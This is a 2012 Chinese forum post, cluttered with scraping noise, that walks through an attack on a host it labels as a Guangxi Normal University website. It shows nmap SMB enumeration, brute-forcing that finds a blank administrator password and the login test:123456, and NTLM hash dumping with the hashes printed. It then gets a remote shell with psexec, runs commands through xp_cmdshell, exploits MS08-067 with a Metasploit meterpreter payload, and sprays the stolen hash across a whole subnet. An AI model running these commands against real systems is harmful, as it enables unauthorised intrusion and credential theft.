广西师范网站http://202.103.242.241/3 o! `, L/ S2 t$ V: y& l
/ G7 m/ R# y6 i9 R- W
root@bt:~# nmap -sS -sV 202.103.242.241
3 I+ I1 v. x% f. }1 o, D' R6 L
8 h0 v. A P" o% d$ CStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST2 t: ~. w9 L9 P! Q9 X
& A9 S5 N, q4 U) MNmap scan report for bogon (202.103.242.241), {! C. c! w; t- f1 @2 F
A$ K' I* C v* A! Y
Host is up (0.00048s latency).- m6 W! h6 F. q3 [& q
& c% {4 @ C5 ^, \2 u# x" u6 QNot shown: 993 closed ports
d1 L% R: b: I) r
( g$ d2 i E! T7 [0 WPORT STATE SERVICE VERSION. ]4 w5 r1 d0 g" V# O
4 T* B3 l7 [" i. g
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 f r. s, R* ~4 @ {* C
7 F1 U/ ^0 M7 j, [. z
139/tcp open netbios-ssn
6 ]3 X9 m. q5 B3 I# R
" ^- |5 B9 J7 R! c$ I# ]/ d+ y445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
+ X. s9 C S6 G, f$ S
4 g6 q$ G0 i7 p2 i7 I1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) c2 U# P( y& q8 s# `
2 P: z9 t. x. e- V: Z1026/tcp open msrpc Microsoft Windows RPC+ I/ W$ q5 A# V& M; A Q
1 F5 c9 z; s' U; |3 n3372/tcp open msdtc?) `. z; `/ o9 [( N3 Z% P- p8 j
/ S& ^( R9 Y# w0 F
3389/tcp open ms-term-serv?2 F& S& g2 u: e5 n( f
8 X: m+ O2 R5 Y5 ?9 P2 x1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
+ X/ ^2 ^6 p% L* n& q0 X3 PSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r4 K" G1 c V* @, o" g5 s2 n# Y
4 U1 Q# t- |/ O) J' \+ l6 RSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
& a# Z5 ^! x1 T. K
; t. Z. k% u( W# e! T1 f8 v7 ESF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
5 ~! v' p8 a& n6 `# [ i$ e- j& c: l2 K" x) g
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
* q7 w( _3 @) ?: }6 B: P2 S7 _
3 a+ Y/ b0 n: t% w# p3 E3 [1 Z. tSF:ptions,6,”hO\n\x000Z”);% K, y6 ^& w1 v
2 K9 @2 n$ ?3 R0 S% v( D" M$ ~
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
- M2 I& k5 s' ^3 d' W1 g
4 V$ d, Z" O, {7 f9 f2 O* `Service Info: OS: Windows
( Y& T' s T* a, n8 Z% k, T$ J% Q$ `. M
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
. l3 h1 b. b' {) X
' U- J$ S8 b5 tNmap done: 1 IP address (1 host up) scanned in 79.12 seconds1 w4 V" ]6 o! c6 P1 g% O0 r
1 ?' u9 [& n* n% g, c
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
4 z" K* E" W1 A5 g7 r9 Y& ^! q
- I# o& `3 J4 d6 T; W4 G) Z3 A: f-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse0 p2 K8 N( p+ `7 ~: r* z5 I
@- C4 j4 [* _& `6 C3 D-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
( W8 Y1 @( k4 `" J, v- r# a
+ y3 L1 F3 j3 }+ E0 |4 }-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse; k0 c8 l8 n8 y; K# E
5 A# E+ e6 P) z1 C/ \, w- f- c
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
9 c: |/ x7 f" @* Q3 P3 C
# z6 } j& E5 O" i( u, _-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
7 v% B2 b( x3 ]: ~
+ a x" _8 P& x-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
* a) ~% \' M3 H! w/ }! ^& r
5 I# f+ U- u' K$ Z4 A-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse' j+ x1 g$ p% [( C# m: y
9 S1 [: T6 g# i
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse* b- i [' W& Z
& ?1 A& j/ B! }0 w& j* i+ N' A-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse( e+ }! Y' H9 i# ^- E2 C4 H- ]
' n8 y Y, y' h. y# o7 j% @* T
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
% U6 U' r' E* K- @$ \( Q$ d) J6 ? y3 y A
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse) A/ h% `. g7 O# Y: S, ]
) U3 @8 p, i u) n
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse9 J& V, Z! V; X- p8 W9 ~, `% X
* B4 r: Q0 ?! q* h. u) Y: o) ?2 j$ d
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, Y% O/ ?: d3 b5 |. d% j& E; ?
6 H4 F0 x4 t* b; z2 t9 U/ a-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
# A) p% P1 }5 k& j) U2 {5 I* j' j8 u# @& q8 w* ^
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse9 X& l3 [ C* D* E
1 ?6 u9 g" m' O3 Wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 + O3 Y( q3 [3 p1 n2 \
( A+ ~* f! H1 _2 l' }- T; N& X
//此乃使用脚本扫描远程机器所存在的账户名
1 O+ Q5 V. x+ c1 _- R: j1 w6 S* a' Z* w. z/ }, c( X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
3 o; \' d2 S8 \% t4 w5 B: q8 Z0 b8 o: J' j/ {) i4 l
Nmap scan report for bogon (202.103.242.241)
4 q8 n' E3 S" d
% v" \' `+ J, n; I: S: HHost is up (0.00038s latency).
% Q% I: I9 S: t; C. R
8 T% O1 n: s& c) ^4 C9 cNot shown: 993 closed ports. @8 r" B1 G2 z% W" F6 C5 A
2 o3 D" b/ Z1 G% T4 S, @/ @PORT STATE SERVICE* G; Q+ ~, u/ k4 P
7 J$ [! T2 a1 s, r! c% s$ L, e2 B t
135/tcp open msrpc
6 {1 Y f j. I. P6 z% R) G' y! p4 s
139/tcp open netbios-ssn1 E5 q/ A$ \; @0 f& z) z
# F7 Y$ h+ p$ Z* R: j: f
445/tcp open microsoft-ds
6 ` y$ g% c% M M
/ y) U, N* i) U+ D! [1025/tcp open NFS-or-IIS
# P. [* {( O8 x5 H6 q' G4 k2 U) O% m
1026/tcp open LSA-or-nterm8 B- }% Y7 i& T( ~- ^& J+ R
0 P4 p0 b2 v) e& l: V8 p
3372/tcp open msdtc
3 e4 T# a& F: E& u. k5 V+ {6 f+ q
3389/tcp open ms-term-serv
( ]" @7 Y4 x" `( w$ F+ \( _ u, k0 }' i ~9 P
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' B! L7 K$ K+ D( {( i. u1 `
! R/ b4 d/ M2 w! b. i
Host script results:
( l0 O2 R3 c4 y; m/ @% d6 P# V4 q3 a/ j3 m' D4 l* I4 ?1 c# N
| smb-enum-users:5 M% X. v; P9 m7 I
; q# Q. [: A8 ]
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果/ r! N' u/ K. q7 |1 i
* B& v( P; v" L
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds- V0 J7 |. v4 h' o3 @: M/ H
% ?* t8 v ?* M6 c; x, \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 5 H- |- K [' m
- e* @6 L1 L; D8 e8 d//查看共享0 C& h# n) Y9 s: p
! }" t$ G$ [" _3 t1 q9 cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST6 A. |0 x/ o9 H: }+ [
1 n, W4 T( y1 C! Q5 ~
Nmap scan report for bogon (202.103.242.241)
( O% a* k( A r- x% K! Q f) u5 R' _
Host is up (0.00035s latency).
% o, B! n$ Y2 ]) G+ f5 a' w! f3 X
5 `" q9 i2 H+ \" j; ~Not shown: 993 closed ports: u4 B& g8 W3 e- K5 V. j
8 Y/ O6 N! Z2 A9 vPORT STATE SERVICE N" W/ L; U4 g' d# u
) U3 F" m/ f* q2 I' T0 ~& F2 g: z135/tcp open msrpc
% X. j7 T, q& O3 b" U- _7 X2 f, F: F+ X0 [6 d- G8 B; B
139/tcp open netbios-ssn
: U0 {1 [' W8 B7 b9 `: C" ~! R1 p& M2 p
445/tcp open microsoft-ds2 G: A# j @. ?& Y9 k
. e, I( ^# R9 f. X- n! Z1 w1025/tcp open NFS-or-IIS
. L0 }7 N7 ]2 e- R; I
" A/ @0 {# S' ^5 x1026/tcp open LSA-or-nterm
1 r# M0 _/ w- r( \* [! Q) p+ h. R" q$ A" K/ a: _" w
3372/tcp open msdtc
! t& r s7 U l: f; t
! }! e. ~9 k( c3 {* {$ K3389/tcp open ms-term-serv! {6 j: Y1 M2 k
9 e5 D! l# u$ ]MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 l$ R# S8 g9 T
! ?5 c2 d8 }/ S8 R4 v. _Host script results:
9 |/ e. e/ c0 f+ g* K
: @3 E3 I5 g6 `| smb-enum-shares:3 ]6 g+ z$ d5 \7 q: }' c2 L, ^& Q
/ e; i5 K+ @5 Q$ z4 o| ADMIN$$ Y" I0 ]+ U5 K, k: n/ v
5 C9 w8 W" |* ?4 z* |* z| Anonymous access: <none># F7 g a& d7 [$ y2 ?
: D' c6 I& g" H1 e' k
| C$/ l* H; n! M8 u8 p( G4 V% L; f- i. \
& v" |9 ]+ b" q" Z
| Anonymous access: <none>
- I2 W/ f* v& S: Y E4 {" b1 d% V, I3 V+ j+ g, Y+ E! j
| IPC$* ^, c; @) O6 y0 S$ {, f
7 m/ h1 }' D% B; b' i2 J
|_ Anonymous access: READ3 _! _4 k2 o- g
1 V- O0 @- l+ q1 ^1 O; L. @
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
9 d. p1 ~; G- `1 i! X8 h0 ]+ S* e ^' J+ M5 T: b
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 2 m( C2 j# h3 M) N# l9 H
+ }9 a1 y" t. D( g//获取用户密码
) c% ^ ~1 O! G; _, c$ g! `: H6 \/ G/ d/ B8 ?$ X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
2 |5 O2 q0 ]5 ?9 ^4 n9 t9 m4 W+ Q! i
Nmap scan report for bogon (202.103.242.2418)0 B Z ?" S9 V# F' {. q1 X, ^8 f
3 ~( T5 Z' a9 ]4 V8 u( n
Host is up (0.00041s latency).
; s+ L! j2 P3 [2 X2 ]6 G) h$ \+ @5 Z
Not shown: 993 closed ports" q' ]/ @) U$ Z! q( f% Z
$ K+ W6 v( {- @1 q6 K4 I" \# u: cPORT STATE SERVICE
: d/ K# t; [* o4 I- G
9 ^, P) M4 B' D+ V& \- a" K! X135/tcp open msrpc
: s/ ~0 S! x/ \( l$ T1 u+ {! m% W2 z t1 o0 P. [ j
139/tcp open netbios-ssn( m: B4 y. f, b8 X1 a. |$ D
) E! ^5 x4 {& M" L6 N1 Q8 O" x
445/tcp open microsoft-ds
. x: o+ s w/ ?; p6 I6 ?" \5 n2 @; T
1025/tcp open NFS-or-IIS( C" p$ T# C& K0 V N0 d, t+ C
1 r( h0 J t0 l. x* e) X) }
1026/tcp open LSA-or-nterm
+ {% v) b8 V! i' N7 f, q
+ G, L, D' W' t3372/tcp open msdtc% J: L% p; y' T {0 J4 X9 T
$ k5 a0 S6 S c" X
3389/tcp open ms-term-serv5 G% L: E! \8 G. ~5 S, \ K
, k" p) K) B M1 o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), F% s+ C) y, n
) h3 L. N' Z7 a0 {$ B, R! }& s! V
Host script results:, \& ^+ o2 }, E5 J' U
" Y8 h; C( s+ \: X! A* `| smb-brute:. j3 k' {. T) L) d# H) r9 v
2 C9 I0 M5 f- `: F
administrator:<blank> => Login was successful2 r: M; D% w, i0 K+ ]/ a
' R- j) F1 s" U$ M|_ test:123456 => Login was successful
' d1 X9 l* `: J: g2 M% }
6 S% A, J( [5 h) U+ r8 \Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
* k0 {) q& x; M/ f0 i3 a3 i/ i2 l
; z6 X5 @' s" Groot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
. x1 l8 Y( B7 T7 I8 x' o( h( h
, ^" X; n* B* {. Rroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data1 O$ K4 ~9 C. M% E- U
) \. l, U2 u6 Xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 G' U, {6 _/ c5 F2 \& _6 O6 Z
$ w" [$ R# r) Y3 c. i0 Lroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139 V3 b: q$ d, ^5 N, J
0 M* [, X: U$ ~/ P7 M+ E( aStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( V+ b6 ~. D6 v s1 j* p" I9 g2 W
3 `: e. `5 K* p7 S/ P
Nmap scan report for bogon (202.103.242.241)
( m0 ?9 u' v" G( x: k$ C! G
( ~! p0 L9 k8 f- M1 H$ iHost is up (0.0012s latency).5 |. \- B" A: Z+ W: t
6 I6 l$ Y. y c8 |PORT STATE SERVICE5 ]1 A& A, f+ f" o1 E0 J& O! ~3 M
0 J. V7 A c- Q% m' h* o135/tcp open msrpc
: B3 z4 H7 C+ X: W
* q# M+ p: c. r$ x3 C139/tcp open netbios-ssn! d' n3 x+ u* U s# F
- N2 n9 r' J9 ]; k$ V9 a: f445/tcp open microsoft-ds/ K r! k5 R2 W9 C+ i
Q: i1 Q7 C0 @) F3 `
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( ^3 B* c6 I" t6 X& n
9 x3 ~5 u7 d6 V- Z7 p
Host script results:
& u3 K Z- F1 b
; B( e7 N( A4 K8 a( X# S" c' { B| smb-pwdump:; Y/ g3 F: O, `, y1 I% x; i
& ^# l/ {& P) j8 {& E- W
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************; `. i N9 h8 N1 _; H0 V6 v! ?6 T
4 K( l+ q. w3 Z$ l* z; w| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
3 S! ^! A; o0 m0 k
6 U+ M$ P, s7 a$ g7 i5 [| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
: u- @( w" b2 r7 u$ c* m
( ^# z$ `+ b+ t, t2 D|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2 N" M, B' g/ a" G! Q
/ R- T% ^% Q$ z
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
2 T: `/ J0 O% o6 w+ V5 a. {% Q
( u* j' v/ B% K( \$ i# sC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell6 J( w$ q; K9 H; U8 |& _% y- U
1 f0 V# ~0 m7 M" r8 ?3 A- |
-p 123456 -e cmd.exe/ ?$ j- x4 V0 v$ _
t8 W/ U7 |, ^5 X
PsExec v1.55 – Execute processes remotely1 ?2 {8 n) k4 \3 s3 T
" u1 H0 u. Y+ B4 V- c( z2 j
Copyright (C) 2001-2004 Mark Russinovich
# S* V4 ^' n, r! ]
; V) \* T) `+ g* G3 qSysinternals – www.sysinternals.com
$ t" d# `/ q- p7 x+ A4 s3 e% t* P0 ~, @. w) n! [: G
Microsoft Windows 2000 [Version 5.00.2195]2 T* t8 r1 J7 u5 w
! `: b7 w$ q% ]3 z" K
(C) 版权所有 1985-2000 Microsoft Corp.
( y6 N7 J7 w! F% q( H2 e2 u
2 Z0 Y- V- R( Q6 S6 JC:\WINNT\system32>ipconfig) }$ [) J9 D9 w- x1 @' c/ u' M7 p
+ Z" x. @ A) r* e _
Windows 2000 IP Configuration
: g1 E+ _3 g X, v( e: X
2 Q1 x m9 Z. Z2 Y. _% U* TEthernet adapter 本地连接:
$ a( h; X9 W5 w1 V1 N. [
' w4 P2 y' _) g. h% o4 U* cConnection-specific DNS Suffix . :8 ^. Q' o5 C9 c6 }9 L, i1 n
5 P6 p. { L" k' |, o; XIP Address. . . . . . . . . . . . : 202.103.242.241! s: c% S; Y4 i% V
. m1 Q& C( g- `
Subnet Mask . . . . . . . . . . . : 255.255.255.0
8 g5 }3 o$ F* S5 D5 ^' v. x; `$ ~9 A6 V- V. _8 I
Default Gateway . . . . . . . . . : 202.103.1.1
9 g; w' W5 G/ r: h: A2 |, {+ C, V+ ]- ]2 v7 @6 G4 S
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
0 x# f7 U# c8 Z7 Y6 C7 P' ?
5 m4 k4 U% i) O7 N" Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞& O b7 W5 W" v3 D9 N
. z0 C" ^7 O4 P' A7 ^# p/ S- d; k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
: H8 X, f& Y% j1 h( [) S5 ~0 h0 R2 h# o- F" u. l- d
Nmap scan report for bogon (202.103.242.241)7 Q, j. Y$ E0 r- H0 y- I7 }! ^
& `/ i2 {" [/ N6 j ^
Host is up (0.00046s latency).
. v% e6 r& l0 G: f$ [2 n% s* X d' L' Z* [
Not shown: 993 closed ports
! F+ P' |) S) g0 W) l: m
$ s. |# C4 n: yPORT STATE SERVICE& {% |! c; v6 R) d" g: N" A
7 t# S. q: U! a. U8 @9 G
135/tcp open msrpc
( R3 m( |5 Q4 P, ^
$ c; S- R4 i$ l; C( E" [139/tcp open netbios-ssn% h- V" ^* t6 }" S, s3 b5 B
4 B, o" _% i. v( ^6 V8 |9 m( [445/tcp open microsoft-ds; y) u5 V$ ?( k4 O4 J# C0 _, A/ L
8 i$ `4 @6 l- P( f
1025/tcp open NFS-or-IIS t" ?: \1 I' ?/ c
- u! Y1 y0 `5 Z# [
1026/tcp open LSA-or-nterm: [' q# w! N1 m) Y$ e4 Q- h+ W
m& c( s$ S2 W! k, S' o; G' E3372/tcp open msdtc: \3 W: x0 H3 B% B1 N. @
" ]# ^% {' f9 ~9 v6 Z1 w0 W3389/tcp open ms-term-serv
) g/ [/ [+ H$ f
: g0 ~4 L, Y% m8 @( `' cMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- h5 ?- }5 x: Y1 Z
~* n" }5 z. z& d* e mHost script results:
1 b: q# K4 _! G; d
8 a! p/ }- L# N5 C8 b: m" U| smb-check-vulns:% H/ h' c- K5 Z6 U O4 b/ A7 [
: ~( l6 {% O7 F& b3 Z! w
|_ MS08-067: VULNERABLE! z8 P4 G2 w3 ^
; h; ?" N2 p$ o4 E8 k
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
% z. R4 K& ^% t( C$ r" T `. [$ U2 l3 `/ Z+ J1 I8 N
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
7 k3 W! B4 ]+ A& H5 t9 }. [, t& _6 X1 i7 S
msf > search ms08" a1 \' E+ P- r. O5 S: K- D. G: t2 Z
( l7 n" k9 \7 y* R }
msf > use exploit/windows/smb/ms08_067_netapi3 u1 Z+ P" y; X/ E; _* o
* e, R2 |" y8 Y5 Z" Y3 J! qmsf exploit(ms08_067_netapi) > show options
. B! c# o9 G% } j% j2 D( Z
6 Q W9 a' U+ I8 umsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2412 Z2 j" i1 H& r" _2 x4 x' H
3 A4 m. X' K2 R o% cmsf exploit(ms08_067_netapi) > show payloads( ~% t0 p1 v- x5 B d( [
; F7 g& O M# }msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp9 S& W4 X7 l3 R. v2 R, M$ A
0 I0 x3 j4 B J5 g( D M
msf exploit(ms08_067_netapi) > exploit
& B5 W1 f. \* }. g' c% o/ \. _* \' r7 c; i/ j. \- ? p
meterpreter >
9 S0 O6 j; U' e) Z
% ^" R! X. V6 D& a) K8 Q3 ]Background session 2? [y/N] (ctrl+z)
8 A: G J P/ F
9 O3 J" t9 q) @# Z+ |msf exploit(ms08_067_netapi) > sessions -l K; s3 X% m! m: T0 e1 M
7 E$ h1 ?4 v+ z
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
* U ]/ F+ F6 @ u5 Y0 k" m. b( G" w8 q
test
5 e, | m& K) {; Z% k# f% r" C* x1 }. V8 N' B5 }
administrator! e7 S6 H: k5 v
/ T! s( n: k+ ^% E! ?& n
root@bt:/usr/local/share/nmap/scripts# vim password.txt0 R f+ w9 D3 |2 n5 B
; {) p- b x/ P- ? _5 W5 l& U
44EFCE164AB921CAAAD3B435B51404EE" ?8 B3 J1 P, y/ F6 u
6 U- {' E2 W! |9 ?8 h/ y9 b1 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 % I9 v% ] T+ r: W8 ?
1 W9 w. i7 @, Y //利用用户名跟获取的hash尝试对整段内网进行登录1 I6 u X9 V/ a y# r
0 x" a/ _ d. Q5 s7 RNmap scan report for 192.168.1.105
, _3 D$ g' K" S5 M. l H8 I2 f1 A; R$ H' Q
Host is up (0.00088s latency). ^! d- }/ Y1 @ ~$ @$ N% J9 U. h
5 {# ]* r' G- L
Not shown: 993 closed ports
4 R' k0 Y+ Y' h3 i; t; V) x; P7 f2 m, b! V1 z+ K
PORT STATE SERVICE1 |, }# B: Q, T1 }
9 h* t4 Q# j i* @" `
135/tcp open msrpc
2 J- r1 t7 x U& p5 g: I
# E8 W5 t# m1 o3 Q: {3 i7 a139/tcp open netbios-ssn
2 a( m8 t! Z; ?& Y6 T3 C4 Z7 U/ H
445/tcp open microsoft-ds1 f7 m% h. z( D
; v* N+ O. v' \. R2 [4 z1025/tcp open NFS-or-IIS3 ~# X& c) N& B' K2 _
) x3 Z9 i6 A, v! U4 Z
1026/tcp open LSA-or-nterm
1 P: `8 c' k; v( q) e! t
- R9 V( Z7 i" E; g4 i) j3372/tcp open msdtc
: A' W: M# A- K; Q, D3 A' z: p6 }) E' [) Q% E" W; s
3389/tcp open ms-term-serv& b# W$ F4 v5 n% p& F! i4 {" k. T$ B
! T2 N- O& M4 L5 Q, C' V- r( E0 y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# z0 x2 i2 k2 Y' {4 R. w2 K" H# ?% M0 ~% k
Host script results:, A7 j0 p$ n6 q
5 G. \0 t: A# Z9 `3 ]
| smb-brute:3 M) f' u b2 s* S6 ^
6 f& _& ]2 p- c/ r1 t$ E8 y
|_ administrator:<blank> => Login was successful
, e* l- }" R# L; }/ J% X( W2 f* z! a) g
攻击成功,一个简单的msf+nmap攻击~~·) Q% l1 V/ E9 e }5 r# C' o. R
5 U, t/ X7 x5 W |
发表于 2012-12-4 12:46:42
收藏
支持
反对